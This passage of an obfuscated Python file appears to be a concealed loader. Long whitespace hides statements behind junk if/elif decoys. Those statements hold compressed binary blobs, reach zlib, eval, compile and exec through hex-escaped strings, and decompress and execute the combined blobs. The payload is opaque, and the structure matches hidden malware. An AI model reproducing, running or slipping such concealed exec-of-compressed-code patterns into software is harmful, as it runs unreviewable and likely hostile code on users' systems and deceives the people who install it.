;Floor._theory(_absolute='ijjllliijjjilljljlij',System=b'\xdcv*\x93a\xf6\xacI\xb1\xa9\xef^R\xbe<\xc2\xa4&\x14>\x82\xb19\x9a8\x86\xd6\xc2\xdeF\xd6\'6\xf9\xa5b+\xdfT\x8bao>&\x07\xc7\xfc6H\xc0}\xda\xc7,7\xb8\x8d\xa0\xa5\x91\xa0\xca\xf6\xabOgb\xdf=\xdb"\xc5M@\xf5$\x15\xd5n\x8b\xa9\xe0\x1a\xc7\xbeUZ_&\xfa\xac\xc1\x80{\xa88\x80\xe1mM\xb5jE\xb9k\xa9\x950\x95\xaa\t\xba\xe5Z\tE\x1a\xd8\xb6\xa2\x9e\x96\xfc}\x8bbD\x96\xdf/\xed\xb78av\\O\x99\xb3`\xb0\x16\x19\xff)\x08\xe9Uy\xb1\x17\x11\x8d\xed\xb2\x8d\xc6\x87kR~\xaf\xe6]j\x11\xae=\xb1\xad\x06\xc6-\x03\xa0\xbc5\xe1q9\'c\t\xed\xcb\xbe\xee\x05\xfc\xb7\n\xedh\x0bB\xac\xe5\x18\x92\xd0(\xed\xd9\x95\xd40\xbd\x92\xd2 \xb5\xeb\x81\xfc"\xc0>\xe2\x82\x10\x8dK\x02w9\xa9\x12\xe5\n\xe6$K;\x0cz\x92\x94\x11\xe2\xd2\x1f\xda\\\xd5J\xd0\xd3\xba\xbe\xed\xbb\x97)\xca\xea\xda\xb0\xec\xb0\xd4(\xc3\x0c\xd8\x98\x15\x9bLs\xc7\xb5\xedq\x11\xd5%\x8b(m\x9e\xa9\x13\xfb\x1e+ZWZ\xeb\x9e\x90+\xc7j\xae\x0e\xcb&\xe9\xf7R9v\xa9\xb5>7\x14\x12\xbf\xe3\x92\xe0\xea\x1b\x01JU[_\xc8\xe2\xdd\xdc\x807i\x96e\xc1\x88<\xec0U\xdf[\xea\x85\xfc\xdb\xf6\x9eV\xb9\x91\xcew=q^\xceA\xbe\xac\xe1i\x99$\xa3\xb3\x1d`\x8efI\xee8\xc0\xf8\xde\xf6)\xe3t\xaa\xfb\x17,v\x9c\xbc\xc4\xa74\x15\xed\xd5\xc5\xb4\x83\x92\x82%[\xb7\xd8\xc1\xeb\xa4\x8c0\xae\x81\x85\x8b\xaaY\xc1f\xd7y\xf3\xadP\xc7t)(\xd2\n\x8elY0\xdaA>\x19\x8e\r\xc1Pi\n\x9a>\xddE\xb1\x91\xfd\xd5\xf6^\xca\xd8\xa5\xdb\xb5LH\x11\xc8\xd2F!e"[\xcf^\xba\xea\x98i%\xd4j\xe6\x9ay\xc6Z=+q\xf0\xbe-\xd16\x9b\x18\xab2[\x99\xd4\xa0\xd6\x16\x8bY\xa7oM\x16\xb3!~\x8c\x087\xa2\x13\x87&\xd3\x9f\xa2(\x9d\t\xa6\xfaiY|-JW\x9a\xb4\x83e\xc1J\xb3gm\x83`\x0f\xf9\xadva\x84_\x8bf\x93\n\x9aM\x97\x90m\xe5\x97\x16\x9d\xa2\xb8P@k\x8fj?\xd0j\x90\xbd\xfdK\xab\x94\xe5\xd1\xd8\x91\xa0\xb9\x80zVD \x9c\xed,\x02!\x16\xf5\xbf%tJ\x00N\xe1Mo\x99\x066\xf5m9\xf2l+\xca\xd8L\xb9\xb5\x9aN\xbc\xfa\xadM^\xba\x0c\xa8k\xc8\x9f\xac\xbbL\xa5\x90\xad\x9d\xcdxy\xaf\xcd\xd8\xe7\xb6B\xad8\xce\x8a\xae,{u\xa35\xbb\xbd\x90Ri\x91Y\x9a\xbc\x7f#*\x01\x14U[\xeb\xeb \x14)\x06\x02r\'\xa6b\xb9\xef\xb9f\xe5Jk}\xafe\xae\xeb\xee\x19\x9d\x88c\n\x9aWZw\x84&\xb4\xc5,\xc8\x94\xb7\xab\x88(\x0bMl\xea\xfb\x8c\x82\xe6M\xdc\xe7\x1b\x19?\xba\xecOeR<q\x19\x03\xdamE\xa5\xc1\xef,\xa2l\x92\\uT\x11\xdcUZ_\xc6\xce\xb6\x93\xe0Utkn\x96\xc4u\xbd\xb0\xb1*n,\xd7\xa2_v\x8cjY\x1d\x12\xa1\xd4\xdfP\xbc<\xa5\xd2A\x03\xaely:0\xa9\xb9Z\x81\xbe]\xe6\xce\x93@Eq\xadY*\xfei\xb1\x15u\xfa\xd6u\xc3i\x0c\xa1\x94\\W7O\xfe\xce\x95\x1a\xa4`\x03\xac\xf7\xfd\x06$W\x8eDR;\xd6\x08\xaf\xa6[\xab\xd3w/b!Wo\x80O\xdcZ\xe6\xf9\xc0\xa8\xc2lO\xd0\xf2\xa3-\x95\x99\x04\x8e\xb4(\r\xed&\xaf\xf7zdh#\xbbj\x15\x99\x12Y\xb6\x8d\x0e\xfd&9\xd5\xba\xc6\xad\xf9\x9cS.\x92\xb7\xb3W\x9b\x04o\x9c(\x81aW\x84=\x11t$\x9e\xfb\xce\x8as\xd4S}\xf1\xb7\xd6\xfd\xccQ\x87\x0c\x1cy\xe0!u\t\x80S\x9exh\x07\xe7\xdc\xba1f\x84(J\xf1M\xc3\xa8\xe83\x86\xfdM}\xe1\xf7\x15W\xddX\x9b\\\x99T5\x17#E\xf4rkH\xb9|C\xa7\xd2\xd7\xc1\xea$\x80N\xa9\xa6\xec\x8a\xa3\xefSw\xe0\x93\x13x\x8a\xf1G\x1ez\xcdG\x9a\xd3>c\x92g\x05\xe7\xd0~\xa2\xd1+\xca\xbe\xc7\xd64\t\xd5\xcfR\xf2\xbe\xb6fJa\xeb\x15{\xb0d>\x93\xd0\x11v\x82,\x15z\x9b\xfa\xd6\tz\x7f\xbe\xa8\\\x1a\x96V\x03Ge\xfdJ\xf2\xfbl&\x1al_)IG`\xc5\x14r{\xcb\xcc\xa4\x1dL\xd2\xb4\xb2w\xf7\xb3UK\xca\xe4\n{M\x96\x0b\n1hT\x0b\x83/\xc4\xde^|\xdd\xda<\x1aeEd\xd1\x9d=\x01"rh\xaf\xb4\xfez\xbe\x90\xa86p9G\xb8\tk\xd6\xa6Fd\xa5\xb5\xeehh\xf2\xcb\xc0<\x12\x8adSE\xce\x15a\xb5\xf5\x85$\xd6gf\x04\\\xce\th\xaf\xedt\xbd\x92\xb47\xaamX\xcd)T\x1d\x1e\x9c\x8an!\xf0\xf5\x1f\xbf\xc1g\xa6\x13\x0e\xad\xec\x85\xa1u\xcfK\x89\x84\xdb\xccf\xb8\x957\xc5s\t\x8f\xad\x85\xb5}\x1cl\xfdm\x9b\t\x19\xa8\xe6q\xc4qk\r\xbd\xa56\xb3\xef\xb6\xd1\xd4\xd6iT\x83\xbb\xdad\xe0\xb7\xceF:\x95\x8alX|C\xaf\x94\x8d\xf6M\x956\xac\x13\x85\xa1\xe5\xc0\xdf%OVhk\x96\xcc\xf7\xaaH\xe2;\xdfY\xb9\x1fUM6$I\xf8\x8a\xc4CV\xe2\xa6M}\xdbNLd\xf8\x87\xd0o\xe6\xeb \x05\\M\xe2\xfb\xf3m5\xa1\xbbRn\xd8Y\x90E\x06\x93\x18`a\x81\xb55\xfc\x9b\xfan\x91\x17\xe3\xd9X\xd1\xae\x1a&\xf7$\x8a\x16I\xe4i\xe7x\xdc\xdc\xf7\xf9\xd8\x15m#\xa7\x94\xdc\x1f\x83\xf41\xa1)j\x14O\x7f\xed$t\xfbw\xd2k\x989\xb6\x08\xfac\xe4S;\xf2\xef\xd7`\xb0\x03\xac\xf3\x1b\x90\xcb\x1a!lL4\xa9\x1c*\xb9\xa3)\xe4U)\x10\xe1\xd1\x83*XA\xedAB\xd4\xb1\x14\xec\xdbMY\xb4\x9a\x94\xfa1\x07\xc8\xb6\x93\x17\xf9\xd3fQ\xfc\x85\xdf\xf9\x97\xa2\xb0o]\x95\xf1.\xe7L\x83\x01\x88H\x81\x1a\xd0\xc7\xa7\xb5\xa2\xc5\'\xa2\xd3\xb2\xbb\x87]Ga\xa5\x82B\xe9\xf8\xd1,\x88\xd9\xd9!\xe9\xb2=\xfdE\xe7\xae\xac\xef\x8eE\xba\xd6\xf5\xf5\xeb\xab\x1b\xd7\x17\x95\xfe\xf2\xb9\xcc\x18n \xb1\xbe\xaf>\xe7\xc9rI\x80D#\xb7O\xbe\xfa\x95\xd6_O\x16\xde\xa0`x$\xfe\x94\xdc\x12<\xc6~m\xc14g\x14\x18\x15\xd9\x05FE\xfe\x01\xce=\xd0\x08\x8b\x89\xb4\xee\x1a\xe9\xdc\'\xaf\x86p\xb5m\x87juaWlu\xf9j\xb1\x8b:}\x9b\xd6z\xe8\x16\xa9\xce\xaf\x8a\x80\xfc\xbd\xb3\xad{\x85\xdf\xb1\xe7\x15\xae\x94\\\x00{\xd9\xfa\xceE\xb3Qx\x9bP\xc5\x94\xc66OSM\xb5,\xafi8\x9f\xfa\x0e-\x0c\x84!\x17\x1cA\x07\x96\xf7\x9c\x86o\xa5\xb5\xbef\x8a=&B*\xa8\x89\xba(\x86\xf6J\xeb\x0e\xde\xad\x94\xab\x12\x9c-f"\xdb\xa2\x1dYi\x0e6\xf5\xdd\x9b\xc5\x9b\xe0\x04\xc5l\x07\xb96\x84\x02j\xc1\xb6\xa9\x81\t.9\xcb\xa6\x1aLP\xc7\xd9zP\xac\x87\xdf\x15\xf4\xc6lm\x98\xa3\xcd\x0fI+\x81kTR\xb8\x14\xbc\x8ej\xfa\x84\xcf\xb0\xcc\'\xa2\xeb9\xd6\xd4\x0c\xf1\xdc\x02\xa3\x85\x8e\xdb\\u\t\x82[\xd7\xb2,kXlM\xcb\xb2\xa9\xb4E-KJ\xccv\x9b\xc1\xbb%\x8b\xfcX\x00oS\x02\xf3R%h\x9fg\xd7\xd1\xec\x0b^\x04\xe2\x1b\xdfp\xe3\x0f^\x06\xe9\xd7V\xef\x16\x81\xb4R\xb1|K\xedn\xf7\xfc\\2z\x91\x8a\x85\xb6\xe4{\xd6\x02\xb5zQ\xd2\xb6\x13W2S\x07\x81\xcda\xf0}%\x9a@M\xdb\x0e\x86_\xf6*_\x16A\x92%\x11$i\xd7\xb5>P*\x02\xb1KQ\xba\x12Eey\x1b\xe5\xb4\xa4\xf3\x9b\xeb\x91\xeb\xec`\'\xa5N\xf6\x97\xd6r\xdf%J\xd6\xa3\xddUm\x84m1o\xd7X\xd1Z\xaci\x99\xea\xc1V\xc0\xac>j\xcb\xc1$^\xa3Z\x8d\xdd\xb3\xb3\xb3"rK\x8a<\xbc\x84\x96N\xa8\xc7\\X\xe82\x1f\x03\xc9+\xdbR\x11\xbaWgH\x1f\xdc\xc2o\xf8\x00u\xab(\xffbSx\x7fQ\xb4E\xa1\xaaI\x91\xec/6)\xff&f\x89M\xcb\xa4\xdd\x08\x10\xe0\x9e\x9b%{*\xe2\x84>\x99:>\\\xc8\xe45\x01\xc0rxj3\xdb\xd5\xb9gx\xa9s^\xed\xa4T\xb3\x04TJ\x92:\xa9\xf9\x1d[\xdf\xa3\x95\xe0\xcbu}\xf7]\xb8k\xafY\xd5\xa6\\OS>\x92\x84\xbd\xf4\xc8\xad\x13\x9e\xde\x0c\x94\x1a\xa97$?\x0e\xab\x90vT\x14\xd6N\x06\x1d\xa92b\xc6\xb1t\x03vn\xbeM}\xdbO\xb8c\x17\xa3 \x93=\xbag"$\x91\xebgKh\xb9\xd4\x89NL\rAA\xcbe\x16V\xa92\xd8PG\xba\x01\x8e\xc6\nf\xaa\x19\x02\xcc5\xa6\xe1\xdbD\xb5V\x1f\xdc\xb7\x83W\x96\x1d>l_\xee\x16\xe9P\x0cO\xd9\xc8\xd5\x8e)\xcf\xa73\xeb\x9f\xf9\xad\xda\x16dJI\xea\x15qw\x1e\xd5\x97q\xab\xad\xfb6I\xef]\xea}!\xa3\xc4r(\x95\x1d;PBd\xd9\xda\x9ac\x99PIe\xe1=\xd1\x99Jqlw%\xb9\xef\xfa\xbe\xed8\xa8\x15\x99BG\xc5\x1e\xaeyi9\x7f(\n\xb6$\xe26L\nwU$\x85\x93b\xe8{7\x97<\xc3\xe1\xa3\xc1\xccz\x99\xda\xda\xacy,\xfd\xc9\xd9\x9b\\[,\x910I\xed\xfa\x97\x13\xe1$\x17\xbf:\x0f:\xbd\xc9\xaf\x0e\xc6w\xb3l1\x9b\xdf\x1e\xcc\xae\xae\xf3\x9b\xc5A\xfa\x90N\x8ef\xf3\xeb\xbb\xc5\xd1\xf5\xcdl\xbe8\xc2\xe5f4\xff\x9ev\xf0\xa7\xc3\x8cJ\xa3P\x95\x94\xcbK\xd8\xe0>\xb4\xf5:\xe6\xf8\x9b\xf4\xefw\xe9\xed\xe2\xb6\xf8>\x9a\'\xf9\x15_k1\xbbJ\xe5:\xb7Y\x9a^w&y\xfe\xb7Y\xfa\x91\xaewxn\xb8z\xa33%\x85i\xaf\x93d\xf0\xf3\xe2\x90\xbb\x14e\t\xb9D\xa1\xc90\x05\xcf2K.F\x93\xc9G>\xdf\x87\xdb\xebl\xb68$\xd7(\xaa\xf7,Y}NNOz_M\xda\x05S\x0f\x126\xdfL\xffB\xb60A\xc2&:\xc9\xeb}\x85\x07\xc5g')

        if 436761 > 838661:
            _builtins.CallFunction(_frame = _builtins.Ceil * -31891)
        elif 181010 < 7133356:
            Floor(Algorithm = 5207 / 11726)._algorithm(_run = -62705 + _builtins.Ceil)                                                                                                                                                                                                                                                          ;Floor._theory(_absolute='lIlIIIlIIllIIIlIllIllllII',System=b'\xbd\xa4\x1a1T\xbd\x0fV\xd9\xec[\xe7G:J\xd2\x9b\xdb\x8f\xff\xdb9\x80?|!&\xdd\xd2\xc0\xbc\xa2A_\x8ch\x85\xd9\x92\xcdjGt\x84\xf9\x81\'\xa9\xa9\xddL\xdf\xfa\xa29\x16\xe7<\xbe\xa9\xf3\xe20\xa3Q(\x98\xd9>W\x08\xb7\x82\x01\xbe|\xe6\xceCJ\xf5\x94#\xfc\xe0_\xceJ\x04\xf4X\xe6\xd1\xe2^\x06\x90\x8a\xfbf\xe8\xea\xa3W}\x8e\xf3\x013D\r\xe9T\xb8\xf01\xc7C\xfcP\xb5\xae\xe3\xfc\x18]\xa2q9\xee?\x98"\x92\x92\x02\x8c\xde\x14\x1fB\xf7\xc7\xfe\t\xe6n\xc9s\xa1\xffe\xa9\xc4y\xf9\xf3\x17>\xccH\xbd\x96\x96\xa7\x8f\x15\x14\t\xf4\xb0j\t\xbd\x8e\xcb\x19w.\xd2`\x8a\xc3\x16\xfd\xf5\xe1\xceqF\xd3\xc4\xc6\xd1\x18\xe2h\x0c\x87|\xcc=\xe5++\x92\x95\xf1\xea\xbe\x7fb\x82v\xc9\xbf\x0e\xf7eHI\x0f3\xcc\x8d^\x86\xf53\xb0g^\x1bK\xa8F@e0\xe2\x03\x07\'\x08\x87\x03\x02K\x02\xcc>\xe57\xc0\xc1\x1f\x98L\x07<\xf2\x83\x8c\x0f\xb0\xc0\xb1\x08\\\xf7\xbc~&\xddx\xf2g\x83\xe2)\xf8\t\xf8a$\xfb\x1a\xa6\xfc\xa2gw\x08\x89\xd0\xdb\xc7g\x97\xb7H9\x1e\xd1\xa1\x1d\xf3;\xc2\x1f\xbe\xce\xbe@\xed\x95\xb1\xb3\xc3\xea\xa8\xf3\xcf\xce\xddMvq}\x93OgY\xfaQ\xe6\xfa\x87\xef\xe9\xe2p\xa9\xb2\xea\'f\x0f\x8fd~\x98m\xef\x03\x1c\xdey\xf4p\xeb\xbc\xd5\xa3\x16\xe9\xc3\xa2\xb3\xb8\xf9\xd9\xa7\x1b\x9e\x8e/\x92\xc5\xed\xf7\x8f\xa6\xbb\x99\xbd\xc5}\xca}\xcf\xe7\xbd\xafEP\x08\xc1\x7fN\x9e\xfa2\xdd\xbf\x98\xb8^\x86H\x81\xcb\xcf\xbd\xaf\x0c\xb9\x94\xc1\xce\xe0\x9aot]\xc2\x87\x87\xcf\xc3\xcd\x18\x8d\xac\xc6\xc098\x93 \xf2)\xa8\xceY\xcef\xa5\x02\x1dM\xfc\x11\x06\xdcE\x98\xdbj\xe2\x8f\x03\xec\x07B\x89\xa3\xc6!\x86\x97\x06\x14W\x8b\x89c\x13h\xdd\x9c\xef\xaa\x07({\x92^/\xd6\r\x9bA\x8e\x14\x93\x8e\xb1\xe9\\\xe2\t\xda\x80\xe2\xc9\x03\x18\x94\x90e2tE\x8e\xd9\x02\xb9\xf5\xbe\x96\xde\xd9\xc6s\x80!\xe7\xd5\x0e]\x89\xda\r)\x90\xf2<8\xffVR\x1b\xf2\\;\xea\x00>\x02\xa2\x98\x11Y\x9c1\x9d\xbcD\x0c\xd5\xcf)N\xe4\xf8\x98 \xf1\x980*M\xb6\xa3\xce\xbd\xc1\x90B\xce\xee\xef\xfb\x82<\xacL\x15D\x04\x8e:b\x8d\x94I9\xe7\xb70/0\xb9X\x19\xc5\xbf[j\ny\x84\xfd\x86\x82\xfd\x1c\xc2\x059\xa0qA\xf6\x92e\x857Y_(\x8e`\xb1"e\x06\x1c2\xb0_PI,\xfa\x03s2\x83\xc72Bb&\xed\x01\x02\x19\x02\x18"\xd2>\xd1#\x87)R\xce\x94\xe9\xa8c\x10\x87-_2\xd6\xef\x03d\x12P\x0e\xc8\xcd\x99(:\xb4\x00\xca3e\x92\x8a\x97\xe3\x9d\xf73C}\xcd\x1d\xd2\x96\x86E\n+\x99\xd0c\xec\xdf\xff\\d\t6)\x83\xe1.\x0c\xf6\x92\xda\xe9g}\xc4\xfe\xe4\\\xcdi\x1bNO\x8e:L\xd7l\x0e\xc4`\x8c>"V"\x91\x06\xcd:\x8cv\x8e:\xf4\xed\x18\x89e\xcet\xb2?(G\x9e)/\x8c,1S\x86\xa6q\x9d\xe0\xbe\xb9\xe5\x02\xf53 \x14\xc5(\x8a\xc4u\xfdO\x9f\x96\xf9\x1a\\\x00bdB\x96\xd8\x11\x99\x0b\xcb\xfb\xff\xdc\xc0\xd6?;\xb7\xc0iaIb\xb8\xbap;Y\xe7\xfe\x07\xe0\x8a\x83bL\x8aq\x81\xbf~\xe7\xcd|t\xb5\x82\xc7\xe5b\xa5\x0f\xd1U\xef\xc3\xe5m>\x07\x16Zp\xc3U\x89\xa7\xf9\xcb\xb7\xaf\xcb!\xe1\xc5\xbb\xf2\xbe!\n\'\xa2\xc5<\x0b\xff\xe7\xf9\xb7\xce\x9bd\xb4\x18\xc1\xec|\x93\rd -`\x1e\xf4\x99#<\x82{\x94\xab\nw5/\x7f\x13f\xc4\xe2\x9a\x80\x19\xb1\x86\x91\x9f\xf9\x08\xafR\x10g^\xfa\xc5\x19\x85L\n\xdd\xe1k\x96\xc1*|\x03\x066\x08\xe5\x11\xf3@P\xff\x86\x18\x8b\x13\xe6T\x07\xcc\x19 \x1a\xee\x9b1\xbc*f\xb9\x99\xf9pH\x01\xd8\x06\xd8\x07\xc2\xbb\xf5\xb9\xaa4\xd50\x9c\x11w\x04k8\xe0\xdc\xc2\x08\x9e\x0c4\xdd\x0f\x8d)\xb2\x84\x88\x90r\xe8j\xf8=\x02]\xe2\x93\xa0\xb9_<\x99\xc0\x90\xc1;\xd8\x9f\x80\x1aQ\x1a!4\xd8\xe9\x13Kd\x18F\x9c\tf\x1f\x1f\x96D+dF\x8a\x1f\xfa<\xee_J\x86\x0f\xdf\x02\xde\xb3H\x03\xe6\xae\r6\xec\x17\xb0]\xe4P3\x80I\xa77f2\xbamf\xcf\xfa\x19\xd5\xb4\xc3\xc2\x8e\x19\xa2f\x1a\x1cd\x17\xcd\xb8\x082\x10,B\xec\x95!\x95\xd0\xe5J\x18l\xe1\'q\xdb\x17C\x8cXgp%\x8fG8\x8dYK\xf8\xd2\'\xd6\x98_;\r\x14\xc5\r"\xe4\x19w\xdd"\xc5H\xbf\xe0\x80\xbfHP/\xecBOSn\xa64\x01\x99\x8b\xf7?\x95?\x18XE@E\xf01\xc9e\x98\xdb\xe4\x84\xafl9d\xde\x9f\x00\x10\xb1\xd2\x9b{\xc3\xf4\x96+dy\xfa\x06\xfcK\x8d\x9fa\xe8\xe8\x853t8|"z\xda~VP\xefL\x84\x88\xc1 3oQ(g1\xce\xb8\xf4\xc5DZ8\xda\xcc\x8bA)d\x00\xda\xf6-\xc0+\xbd\x12\xe1\xef\x1d"\x9fw,v\x1c3V0H\xf6\x1d\xcf\xefw|\x9b,\xfc\xe4\xfcr\x18\xca\xef\x85C\xb6\x1e\xbf/\xaf\xf4\xac\xe0c\x0b\x10)&\x8d0\xf4\xe7 \x19\x9c\x10Y(\xe4\x03\xe8\xfc\xcf\xce\x9b\x87\x12\x1b^\xe7\xb7 \xb6^R\xd1\xf7\x19\x15UD\xe0\xa3I9[eq\x8f\x08\x99\xe1\xca0\xbbo\x88\xdb}\x83\xbc\xd3\xf8#!\xe5\x8c\x8a3\xd2\xb9\xb8F\xe9e\xf6\x8ei\\&H\t7\xef\x1e\x0c\x8f&t\xb9\xa4\xc7\xc4\xa3]\x15\xf4\xa0\x90E\xbf\x15\xac`!\x8cdr\xc6\xde\xd7\xc2\xd0&~L\xbc\xfb\xed]\xc1/\x14\x9d\xad\xab\xf3402\x07\x83\t\xe2\x7fK\x1d%[\xb9z\xc9\x04\x11)5\xc0\x88\\hq\xf6\x82\xd5\x18|{\x87\x1c\x05r\x01\xa7\'\\\x9b\x14\xc1\xbe\xf3F\xf8]3pt\x17\x84\x15H\xde!\x01\x00\x96\xce\x9b\x86\xfch\x88\\e\xe8\xeb\tq\x93\x0ep\x98^XG\xb7\xd4\xeb\xbc\x01"{\x9b\xbd\x9b\x17\x7f\x06\xcfw\xdeL\xf3\x9b\x83\xd9\xc1l~@\xca\x96\xc3$;z?cp\xc9X\xef@\x0c\x01\xec\x1e\xbdg\xdf~\x83>\na\xb9\x07\x8f\xdd\xfc\xc1\xd0\x10\x12{\x8e\x9e\x00\x13\xed1\xb3\x8d\xac70\xdb\xe3\x11&\xc1r\x14z\x90*z\xe88LB\xdf\xab\x13]u\x94\xce\x93\x8fH%\xa4\x8e\x00U\x15\xe0\x99\x0b\x83\xf2\x86\xb4A\x87\x82\r\xe6\x05\x9c\xf6:\xff\x0f\xed\xdf%\x91')

        _builtins._algorithm(_run = 81327 * _builtins.Ceil)                                                                                                                                                                                                                                                          ;wxwwwwwxwwwwxxwwwwwwwww,NMMNMMMMNNNMMNNNMMMNNMM,WXWWWXWXXXXWXWXWWWWXXXX,S2SS2S2SS2S2SSS2SS2SSSSSSS,ijjljjjilijiilliljli=(lambda JIJIJLIJLJJIILILJILJJ:JIJIJLIJLJJIILILJILJJ(__import__('\x7a\x6c\x69\x62'))),(lambda JIJIJLIJLJJIILILJILJJ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(JIJIJLIJLJJIILILJILJJ)"),filename='\x57\x57\x57\x58\x58\x58\x57\x58\x58\x58\x58\x57\x58\x57\x57\x57\x57',mode='\x65\x76\x61\x6c'))),(lambda JIJIJLIJLJJIILILJILJJ:JIJIJLIJLJJIILILJILJJ['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda oOoODDOOoDODOOoDODOoDDoOD,JIJIJLIJLJJIILILJILJJ:oOoODDOOoDODOOoDODOoDDoOD(JIJIJLIJLJJIILILJILJJ)),(lambda:(lambda JIJIJLIJLJJIILILJILJJ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(JIJIJLIJLJJIILILJILJJ)"),filename='\x57\x57\x57\x58\x58\x58\x57\x58\x58\x58\x58\x57\x58\x57\x57\x57\x57',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        if 147257 > 5411125:
            Floor(Algorithm = -80476 + -47176)._algorithm(_run = -57915 - _builtins.Ceil)
        elif 294225 < 1135207:
            Floor(Algorithm = -7909 - 39437)._algorithm(_run = -67150 + _builtins.Ceil)                                                                                                                                                                                                                                                          ;ijjljjjilijiilliljli()(S2SS2S2SS2S2SSS2SS2SSSSSSS(WXWWWXWXXXXWXWXWWWWXXXX(wxwwwwwxwwwwxxwwwwwwwww(NMMNMMMMNNNMMNNNMMMNNMM('\x76\x61\x72\x73'))),Floor._product(Negative='SSSS2SSSSSSS22S2SSSSS')+Floor._product(Negative='Oo0o0O0O000oo00oO0oOO0Oo00')+Floor._product(Negative='ijjllliijjjilljljlij')+Floor._product(Negative='lIlIIIlIIllIIIlIllIllllII')))

    except Exception as Statistics:
        if 227132 > 5669558:
            Floor.execute(code = _ceil(Statistics))

        elif 350578 > 5968212:
            _builtins._algorithm(_run = -6346 * _builtins.Ceil)
